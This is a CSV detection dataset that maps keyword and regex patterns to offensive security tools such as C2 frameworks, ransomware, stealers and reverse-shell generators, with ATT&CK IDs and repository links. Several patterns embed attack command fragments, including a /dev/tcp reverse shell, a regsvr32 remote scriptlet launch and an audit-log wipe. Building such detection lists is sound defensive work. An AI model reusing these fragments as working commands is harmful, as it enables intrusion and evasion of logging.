===*",".{0,1000}\=\=\=\sLAUNCHING\sSMB\sSERVER\sAND\sWAITING\sFOR\sGPT\sREQUESTS\s\=\=\=.{0,1000}","offensive_tool_keyword","Ouned","The OUned project automating Active Directory Organizational Units ACL exploitation through gPLink poisoning","T1484 - T1210","TA0001 - TA0004 - TA0005 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/synacktiv/Ouned","1","0","N/A","10","1","50","7","2024-04-17T10:34:03Z","2024-04-17T10:18:04Z" "*=== SharpUp: Running Privilege Escalation Checks ===*",".{0,1000}\=\=\=\sSharpUp\:\sRunning\sPrivilege\sEscalation\sChecks\s\=\=\=.{0,1000}","offensive_tool_keyword","SharpUp","SharpUp is a C# port of various PowerUp functionality. Currently. only the most common checks have been ported. no weaponization functions have yet been implemented.","T1003 - T1082 - T1057 - T1069 - T1083","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/GhostPack/SharpUp","1","0","N/A","N/A","10","1134","232","2024-02-14T16:38:26Z","2018-07-24T17:39:33Z" "*=== SPOOFING THE GPLINK ATTRIBUTE OF THE TARGET OU ===*",".{0,1000}\=\=\=\sSPOOFING\sTHE\sGPLINK\sATTRIBUTE\sOF\sTHE\sTARGET\sOU\s\=\=\=.{0,1000}","offensive_tool_keyword","Ouned","The OUned project automating Active Directory Organizational Units ACL exploitation through gPLink poisoning","T1484 - T1210","TA0001 - TA0004 - TA0005 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/synacktiv/Ouned","1","0","N/A","10","1","50","7","2024-04-17T10:34:03Z","2024-04-17T10:18:04Z" "*=== WAITING (GPT REQUESTS WILL BE FORWARDED TO SMB SERVER) ===*",".{0,1000}\=\=\=\sWAITING\s\(GPT\sREQUESTS\sWILL\sBE\sFORWARDED\sTO\sSMB\sSERVER\)\s\=\=\=.{0,1000}","offensive_tool_keyword","Ouned","The OUned project automating Active Directory Organizational Units ACL exploitation through gPLink poisoning","T1484 - T1210","TA0001 - TA0004 - TA0005 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/synacktiv/Ouned","1","0","N/A","10","1","50","7","2024-04-17T10:34:03Z","2024-04-17T10:18:04Z" "*=== WAITING (SMB NTLM AUTHENTICATION COERCED TO *",".{0,1000}\=\=\=\sWAITING\s\(SMB\sNTLM\sAUTHENTICATION\sCOERCED\sTO\s.{0,1000}","offensive_tool_keyword","Ouned","The OUned project automating Active Directory Organizational Units ACL exploitation through gPLink poisoning","T1484 - T1210","TA0001 - TA0004 - TA0005 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/synacktiv/Ouned","1","0","N/A","10","1","50","7","2024-04-17T10:34:03Z","2024-04-17T10:18:04Z" "*===[[[ A Black Path Toward The Sun ]]]===*",".{0,1000}\=\=\=\[\[\[\sA\sBlack\sPath\sToward\sThe\sSun\s\]\]\]\=\=\=.{0,1000}","offensive_tool_keyword","ABPTTS","TCP tunneling over HTTP/HTTPS for web application servers","T1071.001 - T1573","TA0003 - TA0011","N/A","N/A","Persistence","https://github.com/nccgroup/ABPTTS","1","0","N/A","9","8","714","157","2016-08-12T19:36:24Z","2016-07-29T21:45:57Z" "*=========== Havoc and msf revshell ========*",".{0,1000}\=\=\=\=\=\=\=\=\=\=\=\sHavoc\sand\smsf\srevshell\s\=\=\=\=\=\=\=\=.{0,1000}","offensive_tool_keyword","DarkWidow","Indirect Dynamic Syscall SSN + Syscall address sorting via Modified TartarusGate approach + Remote Process Injection via APC Early Bird + Spawns a sacrificial Process as target process + (ACG+BlockDll) mitigation policy on spawned process + PPID spoofing (Emotet method) + Api resolving from TIB + API hashing","T1055 - T1055.012 - T1055.002 - T1098 - T1027 - T1027.001 - T1070.004 - T1036 - T1134 - T1140","TA0005 - TA0003 - TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/reveng007/DarkWidow","1","0","N/A","10","5","452","69","2024-04-19T20:15:04Z","2023-07-24T13:59:16Z" "*===PARASITE INVOKE*",".{0,1000}\=\=\=PARASITE\sINVOKE.{0,1000}","offensive_tool_keyword","Parasite-Invoke","Hide your P/Invoke signatures through other people's signed assemblies","T1129 - T1574.002 - T1218","TA0005","N/A","N/A","Defense Evasion","https://github.com/MzHmO/Parasite-Invoke","1","0","N/A","8","2","180","30","2024-03-10T14:53:59Z","2024-03-07T20:18:42Z" "*==gCkV2Zh5WYNNXZB5SeoBXYyd2b0BXeyNkL5RXayV3YlNlLtVGdzl3U*",".{0,1000}\=\=gCkV2Zh5WYNNXZB5SeoBXYyd2b0BXeyNkL5RXayV3YlNlLtVGdzl3U.{0,1000}","offensive_tool_keyword","Invoke-Stealth","Simple & Powerful PowerShell Script Obfuscator","T1027.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/JoelGMSec/Invoke-Stealth","1","0","N/A","9","4","N/A","N/A","N/A","N/A" "*==gNyEDMx80UJpjOdVGZv10ZulGZkFGUukHawFmcn9GdwlncD5Se0lmc1NWZT5SblR3c5N1W*",".{0,1000}\=\=gNyEDMx80UJpjOdVGZv10ZulGZkFGUukHawFmcn9GdwlncD5Se0lmc1NWZT5SblR3c5N1W.{0,1000}","offensive_tool_keyword","Invoke-Stealth","Simple & Powerful PowerShell Script Obfuscator","T1027.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/JoelGMSec/Invoke-Stealth","1","0","N/A","9","4","N/A","N/A","N/A","N/A" "*==gQDVkO60VZk9WTyVGawl2QukHawFmcn9GdwlncD5Se0lmc1NWZT5SblR3c5N1W*",".{0,1000}\=\=gQDVkO60VZk9WTyVGawl2QukHawFmcn9GdwlncD5Se0lmc1NWZT5SblR3c5N1W.{0,1000}","offensive_tool_keyword","Invoke-Stealth","Simple & Powerful PowerShell Script Obfuscator","T1027.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/JoelGMSec/Invoke-Stealth","1","0","N/A","9","4","N/A","N/A","N/A","N/A" "*==wcvJXZapjOdVGZv10ZulGZkFGUukHawFmcn9GdwlncD5Se0lmc1NWZT5SblR3c5N1W*",".{0,1000}\=\=wcvJXZapjOdVGZv10ZulGZkFGUukHawFmcn9GdwlncD5Se0lmc1NWZT5SblR3c5N1W.{0,1000}","offensive_tool_keyword","Invoke-Stealth","Simple & Powerful PowerShell Script Obfuscator","T1027.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/JoelGMSec/Invoke-Stealth","1","0","N/A","9","4","N/A","N/A","N/A","N/A" "*==wMykDWJNlTBpjOdVGZv10ZulGZkFGUukHawFmcn9GdwlncD5Se0lmc1NWZT5SblR3c5N1W*",".{0,1000}\=\=wMykDWJNlTBpjOdVGZv10ZulGZkFGUukHawFmcn9GdwlncD5Se0lmc1NWZT5SblR3c5N1W.{0,1000}","offensive_tool_keyword","Invoke-Stealth","Simple & Powerful PowerShell Script Obfuscator","T1027.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/JoelGMSec/Invoke-Stealth","1","0","N/A","9","4","N/A","N/A","N/A","N/A" "*==wNTN0SQpjOdVGZv10ZulGZkFGUukHawFmcn9GdwlncD5Se0lmc1NWZT5SblR3c5N1W*",".{0,1000}\=\=wNTN0SQpjOdVGZv10ZulGZkFGUukHawFmcn9GdwlncD5Se0lmc1NWZT5SblR3c5N1W.{0,1000}","offensive_tool_keyword","Invoke-Stealth","Simple & Powerful PowerShell Script Obfuscator","T1027.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/JoelGMSec/Invoke-Stealth","1","0","N/A","9","4","N/A","N/A","N/A","N/A" "*==wQCNkO60VZk9WTyVGawl2QukHawFmcn9GdwlncD5Se0lmc1NWZT5SblR3c5N1W*",".{0,1000}\=\=wQCNkO60VZk9WTyVGawl2QukHawFmcn9GdwlncD5Se0lmc1NWZT5SblR3c5N1W.{0,1000}","offensive_tool_keyword","Invoke-Stealth","Simple & Powerful PowerShell Script Obfuscator","T1027.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/JoelGMSec/Invoke-Stealth","1","0","N/A","9","4","N/A","N/A","N/A","N/A" "*=Administrator.ccache*",".{0,1000}\=Administrator\.ccache.{0,1000}","offensive_tool_keyword","PKINITtools","Tools for Kerberos PKINIT and relaying to AD CS","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/dirkjanm/PKINITtools","1","0","N/A","N/A","6","573","72","2024-04-12T14:04:35Z","2021-07-27T19:06:09Z" "*=imaohw*",".{0,1000}\=imaohw.{0,1000}","offensive_tool_keyword","powershell","powershell obfuscations techniques observed by malwares - reversed whoami","T1021 - T1024 - T1027 - T1035 - T1059 - T1070","TA0001 - TA0002 - TA0003 - TA0005 - TA0006","Qakbot","N/A","Defense Evasion","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*=MSEXCEL*regsvr32 /s /n /u /i:http*/SCTLauncher.sct scrobj.dll*",".{0,1000}\=MSEXCEL.{0,1000}regsvr32\s\/s\s\/n\s\/u\s\/i\:http.{0,1000}\/SCTLauncher\.sct\sscrobj\.dll.{0,1000}","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Frameworks","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","9","10","4032","652","2024-04-05T08:39:49Z","2018-06-13T21:58:59Z" "*=ogIXFlckIzYIRCekEHMORiIgwWY2VmCpICcahHJVRCTkcVUyRie5YFJ3RiZkAnW4RidkIzYIRiYkcHJzRCZkcVUyRyYkcHJyMGSkICIsFmdlhCJ9gnC*",".{0,1000}\=ogIXFlckIzYIRCekEHMORiIgwWY2VmCpICcahHJVRCTkcVUyRie5YFJ3RiZkAnW4RidkIzYIRiYkcHJzRCZkcVUyRyYkcHJyMGSkICIsFmdlhCJ9gnC.{0,1000}","offensive_tool_keyword","CamHacker","Camera phishing tool. If anyone opens link generated by CamHacker and permits camera access his/her photo will be captured!","T1598 - T1204 - T1566.001","TA0009 - TA0010 - TA0043","N/A","N/A","Phishing","https://github.com/KasRoudra/CamHacker","1","0","N/A","10","N/A","N/A","N/A","N/A","N/A" "*=resu ten*",".{0,1000}\=resu\sten.{0,1000}","offensive_tool_keyword","powershell","powershell obfuscations techniques observed by malwares - reversed net user","T1021 - T1024 - T1027 - T1035 - T1059 - T1070","TA0001 - TA0002 - TA0003 - TA0005 - TA0006","Qakbot","N/A","Defense Evasion","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*> /var/log/audit/audit.log* rm -f .*",".{0,1000}\>\s\/var\/log\/audit\/audit\.log.{0,1000}\srm\s\-f\s\..{0,1000}","offensive_tool_keyword","EQGRP tools","Equation Group hack tool leaked note defense evasion","T1055 - T1036 - T1038 - T1203 - T1059","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/Artogn/EQGRP-1/blob/master/Linux/bin/Auditcleaner","1","0","N/A","N/A","1","1","1","2017-04-10T05:02:35Z","2017-04-10T06:59:29Z" "*>[ STARTING CRASH DUMP ACQUISITION ]<*",".{0,1000}\>\[\sSTARTING\sCRASH\sDUMP\sACQUISITION\s\]\<.{0,1000}","offensive_tool_keyword","Forensike","Remotely dump NT hashes through Windows Crash dumps","T1003","TA0006","N/A","N/A","Credential Access","https://github.com/bmarchev/Forensike","1","0","N/A","10","1","17","2","2024-03-18T10:40:58Z","2024-02-01T13:52:55Z" "*>[ STARTING NT HASHES EXTRACTION ]<*",".{0,1000}\>\[\sSTARTING\sNT\sHASHES\sEXTRACTION\s\]\<.{0,1000}","offensive_tool_keyword","Forensike","Remotely dump NT hashes through Windows Crash dumps","T1003","TA0006","N/A","N/A","Credential Access","https://github.com/bmarchev/Forensike","1","0","N/A","10","1","17","2","2024-03-18T10:40:58Z","2024-02-01T13:52:55Z" "*>\fuego-control*",".{0,1000}\>\\fuego\-control.{0,1000}","offensive_tool_keyword","fuegoshell","Fuegoshell is a powershell oneliner generator for Windows remote shell re-using TCP 445","T1059.001 - T1203","TA0002 - TA0011 - TA0008","N/A","N/A","Lateral Movement","https://github.com/v1k1ngfr/fuegoshell","1","0","named pipe","10","1","6","1","2024-04-27T09:03:28Z","2024-04-27T08:06:03Z" "*>\fuego-data*",".{0,1000}\>\\fuego\-data.{0,1000}","offensive_tool_keyword","fuegoshell","Fuegoshell is a powershell oneliner generator for Windows remote shell re-using TCP 445","T1059.001 - T1203","TA0002 - TA0011 - TA0008","N/A","N/A","Lateral Movement","https://github.com/v1k1ngfr/fuegoshell","1","0","named pipe","10","1","6","1","2024-04-27T09:03:28Z","2024-04-27T08:06:03Z" "*>\fuegoshell*",".{0,1000}\>\\fuegoshell.{0,1000}","offensive_tool_keyword","fuegoshell","Fuegoshell is a powershell oneliner generator for Windows remote shell re-using TCP 445","T1059.001 - T1203","TA0002 - TA0011 - TA0008","N/A","N/A","Lateral Movement","https://github.com/v1k1ngfr/fuegoshell","1","0","named pipe","10","1","6","1","2024-04-27T09:03:28Z","2024-04-27T08:06:03Z" "*>--~~--> Args? <--~~--<*",".{0,1000}\>\-\-\~\~\-\-\>\sArgs\?\s\<\-\-\~\~\-\-\<.{0,1000}","offensive_tool_keyword","StandIn","StandIn is a small .NET35/45 AD post-exploitation toolkit","T1087 - T1069 - T1558 - T1204 - T1136 - T1482","TA0007 - TA0003 - TA0006 - TA0004","N/A","N/A","Discovery","https://github.com/FuzzySecurity/StandIn","1","0","N/A","9","7","656","120","2023-12-02T21:20:09Z","2020-11-05T22:49:27Z" "*>> Where to hide the payload? Select a number: *",".{0,1000}\>\>\sWhere\sto\shide\sthe\spayload\?\sSelect\sa\snumber\:\s.{0,1000}","offensive_tool_keyword","TripleCross","A Linux eBPF rootkit with a backdoor - C2 - library injection - execution hijacking - persistence and stealth capabilities.","T1055 - T1021.005 - T1055.011 - T1055.003 - T1547 - T1574 - T1027 - T1070.004 - T1562.001","TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/h3xduck/TripleCross","1","0","N/A","10","10","1709","211","2024-04-07T02:06:19Z","2021-10-27T17:47:58Z" "*>BrowsingHistoryView<*",".{0,1000}\>BrowsingHistoryView\<.{0,1000}","offensive_tool_keyword","BrowsingHistoryView","BrowsingHistoryView is a utility that reads the history data of different Web browsers","T1602 - T1119 - T1005","TA0009","N/A","N/A","Discovery","https://www.nirsoft.net/utils/browsing_history_view.html","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*>CursorSvc<*",".{0,1000}\>CursorSvc\<.{0,1000}","offensive_tool_keyword","Fentanyl","Stealer Malware - Steal Discord Tokens (+ Much More Info) - Steal Passwords/Cookies/History/Credit Cards/Phone Numbers and Addresses from all Browsers (Profile Support) - Steal PC Info - Steal Video Game Accounts (Adding more games + wallets and VPN's) - Low Detections - Anti VM - Sort of Fast - Startup - IP Logger","T1547.001 - T1552.001 - T1552.005 - T1110.001 - T1082 - T1562.001 - T1574.002 - T1529 - T1497.001 - T1543.003 - T1592.001","TA0005 - TA0006 - TA0040 - TA0003 - TA0009","N/A","N/A","Malware","https://github.com/dekrypted/Fentanyl","1","0","N/A","10","1","57","13","2023-03-13T20:03:44Z","2022-07-22T16:30:13Z" "*>-Infected Systems Database-*",".{0,1000}\>\-Infected\sSystems\sDatabase\-\<\/span\>.{0,1000}","offensive_tool_keyword","Jasmin-Ransomware","Jasmin Ransomware is an advanced red team tool (WannaCry Clone) used for simulating real ransomware attacks","T1486","TA0040 - TA0002 - TA0010","N/A","N/A","Ransomware","https://github.com/codesiddhant/Jasmin-Ransomware","1","0","N/A","10","2","186","68","2021-03-01T14:51:06Z","2021-02-27T07:09:08Z" "*>Jasmin Encryptor<*",".{0,1000}\>Jasmin\sEncryptor\<.{0,1000}","offensive_tool_keyword","Jasmin-Ransomware","Jasmin Ransomware is an advanced red team tool (WannaCry Clone) used for simulating real ransomware attacks","T1486","TA0040 - TA0002 - TA0010","N/A","N/A","Ransomware","https://github.com/codesiddhant/Jasmin-Ransomware","1","0","N/A","10","2","186","68","2021-03-01T14:51:06Z","2021-02-27T07:09:08Z" "*>Jasmin Ransomware*",".{0,1000}\>Jasmin\sRansomware\<\/div\>.{0,1000}","offensive_tool_keyword","Jasmin-Ransomware","Jasmin Ransomware is an advanced red team tool (WannaCry Clone) used for simulating real ransomware attacks","T1486","TA0040 - TA0002 - TA0010","N/A","N/A","Ransomware","https://github.com/codesiddhant/Jasmin-Ransomware","1","0","N/A","10","2","186","68","2021-03-01T14:51:06Z","2021-02-27T07:09:08Z" "*>JSP Backdoor Reverse Shell<*",".{0,1000}\>JSP\sBackdoor\sReverse\sShell\<.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*>KerberOPSECKerberOPSEC\<\/.{0,1000}","offensive_tool_keyword","KerberOPSEC","OPSEC safe Kerberoasting in C#","T1558.003","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/Luct0r/KerberOPSEC","1","0","N/A","10","2","185","22","2022-06-14T18:10:25Z","2022-01-07T17:20:40Z" "*>Obfuscar Console Utility<*",".{0,1000}\>Obfuscar\sConsole\sUtility\<.{0,1000}","offensive_tool_keyword","WebSocketReverseShellDotNet","A .NET-based Reverse Shell, it establishes a link to the command and control for subsequent guidance.","T1071 - T1105","TA0011 - TA0002","N/A","N/A","C2","https://github.com/The-Hustler-Hattab/WebSocketReverseShellDotNet","1","0","N/A","10","10","1","0","2024-04-18T01:00:48Z","2023-12-03T03:35:24Z" "*>Password Recovery for Remote Desktop<*",".{0,1000}\>Password\sRecovery\sfor\sRemote\sDesktop\<.{0,1000}","offensive_tool_keyword","rdpv","Remote Desktop PassView is a small utility that reveals the password stored by Microsoft Remote Desktop Connection utility inside the .rdp files.","T1110 - T1560.001 - T1555.003 - T1212","TA0006 - TA0007","N/A","N/A","Credential Access","https://www.nirsoft.net/utils/remote_desktop_password.html","1","0","N/A","8","10","N/A","N/A","N/A","N/A" "*>Remote Desktop PassView<*",".{0,1000}\>Remote\sDesktop\sPassView\<.{0,1000}","offensive_tool_keyword","rdpv","Remote Desktop PassView is a small utility that reveals the password stored by Microsoft Remote Desktop Connection utility inside the .rdp files.","T1110 - T1560.001 - T1555.003 - T1212","TA0006 - TA0007","N/A","N/A","Credential Access","https://www.nirsoft.net/utils/remote_desktop_password.html","1","0","N/A","8","10","N/A","N/A","N/A","N/A" "*>SharpSploit<*",".{0,1000}\>SharpSploit\<.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/cobbr/SharpSploit","1","0","N/A","10","10","1692","303","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z" "*>TeamFiltration.dll<*",".{0,1000}\>TeamFiltration\.dll\<.{0,1000}","offensive_tool_keyword","TeamFiltration","TeamFiltration is a cross-platform framework for enumerating, spraying, exfiltrating, and backdooring O365 AAD accounts","T1110 - T1087 - T1560.001 - T1592 - T1071","TA0001 - TA0003 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Flangvik/TeamFiltration","1","0","N/A","10","10","965","105","2023-11-08T17:41:59Z","2022-06-28T00:00:28Z" "*>Tor2web Error: *",".{0,1000}\>Tor2web\sError\:\s.{0,1000}","offensive_tool_keyword","tor2web","Tor2web is an HTTP proxy software that enables access to Tor Hidden Services by mean of common web browsers","T1090 - T1071","TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/tor2web/Tor2web","1","0","N/A","9","7","684","175","2023-02-07T21:52:31Z","2011-12-17T15:14:02Z" "*>User32LogonProcesss<*",".{0,1000}User32LogonProcesss.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://x.com/_RastaMouse/status/1747636529613197757","1","0","typo in the process name used when calling LsaRegisterLogonProcess","10","10","N/A","N/A","N/A","N/A" "*0.0.0.0:2222*",".{0,1000}0\.0\.0\.0\:2222.{0,1000}","offensive_tool_keyword","DoHC2","DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/SpiderLabs/DoHC2","1","0","N/A","10","10","440","100","2020-08-07T12:48:13Z","2018-10-23T19:40:23Z" "*0.0.0.0:4444*",".{0,1000}0\.0\.0\.0\:4444.{0,1000}","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","0","N/A","6","8","773","101","2024-04-20T20:46:48Z","2019-11-04T11:37:38Z" "*0.0.0.0:4445*",".{0,1000}0\.0\.0\.0\:4445.{0,1000}","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","0","N/A","6","8","773","101","2024-04-20T20:46:48Z","2019-11-04T11:37:38Z" "*0.0.0.0:53531*",".{0,1000}0\.0\.0\.0\:53531.{0,1000}","offensive_tool_keyword","dnscat2","This tool is designed to create an encrypted command-and-control (C&C) channel over the DNS protocol","T1071.004 - T1102 - T1071.001","TA0002 - TA0003 - TA0008","N/A","N/A","C2","https://github.com/iagox86/dnscat2","1","1","N/A","10","10","3256","587","2024-03-14T11:17:49Z","2013-01-04T23:15:55Z" "*0<&196;exec 196<>/dev/tcp/*/*; sh <&196 >&196 2>&196*",".{0,1000}0\<\&196\;exec\s196\<\>\/dev\/tcp\/.{0,1000}\/.{0,1000}\;\ssh\s\<\&196\s\>\&196\s2\>\&196.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*00_create_all_modules_test*",".{0,1000}00_create_all_modules_test.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*00000000000000000041d00000041d9535d5979f591ae8e547c5e5743e5b64*",".{0,1000}00000000000000000041d00000041d9535d5979f591ae8e547c5e5743e5b64.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","0","N/A","10","10","1075","161","2023-07-15T05:34:10Z","2020-06-30T19:24:13Z" "*00000000000000000043d43d00043de2a97eabb398317329f027c66e4c1b01*",".{0,1000}00000000000000000043d43d00043de2a97eabb398317329f027c66e4c1b01.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*00393218120b164c3069439284c49edd5a99be83482ed9149ce9af0e8026e61a*",".{0,1000}00393218120b164c3069439284c49edd5a99be83482ed9149ce9af0e8026e61a.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*004126d3014ab8a47172a1b7b0c88673283f9f245e1ce550846ef71bcac84524*",".{0,1000}004126d3014ab8a47172a1b7b0c88673283f9f245e1ce550846ef71bcac84524.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*004b28244f398a619fe7d668f5ab925210e8a720c82344ae2f5acefaff30672f*",".{0,1000}004b28244f398a619fe7d668f5ab925210e8a720c82344ae2f5acefaff30672f.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*00630066-0B43-474E-A93B-417CF1A65195*",".{0,1000}00630066\-0B43\-474E\-A93B\-417CF1A65195.{0,1000}","offensive_tool_keyword","impersonate","A windows token impersonation tool","T1134 - T1550","TA0004 - TA0003","N/A","N/A","Lateral Movement","https://github.com/sensepost/impersonate","1","0","N/A","10","3","257","33","2023-04-19T12:53:50Z","2022-10-28T06:30:02Z" "*00a5af2d7b92becb455b7c5f00faba0aaf6176143601b2cf69cfe2d1ade75f69*",".{0,1000}00a5af2d7b92becb455b7c5f00faba0aaf6176143601b2cf69cfe2d1ade75f69.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*00b810771a57f7aab571f2e63288ef88e4929b941108dd5e5ae9bedebf4ef49b*",".{0,1000}00b810771a57f7aab571f2e63288ef88e4929b941108dd5e5ae9bedebf4ef49b.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*00cce05cfc7ac3c284be62e98c8ffb25*",".{0,1000}00cce05cfc7ac3c284be62e98c8ffb25.{0,1000}","offensive_tool_keyword","iodine","iodine. iodined - tunnel IPv4 over DNS","T1573.001 - T1573.002 - T1573.003 - T1573.004","TA0011 - TA0010 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/yarrick/iodine","1","0","N/A","10","10","5794","495","2023-11-29T23:29:17Z","2012-02-04T19:51:39Z" 